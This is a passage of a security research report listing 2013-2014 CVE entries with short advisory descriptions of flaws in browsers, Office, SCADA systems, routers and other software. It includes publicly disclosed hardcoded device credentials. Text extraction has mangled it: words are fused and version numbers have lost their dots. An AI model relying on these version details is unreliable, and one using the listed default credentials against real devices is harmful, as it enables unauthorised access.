CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
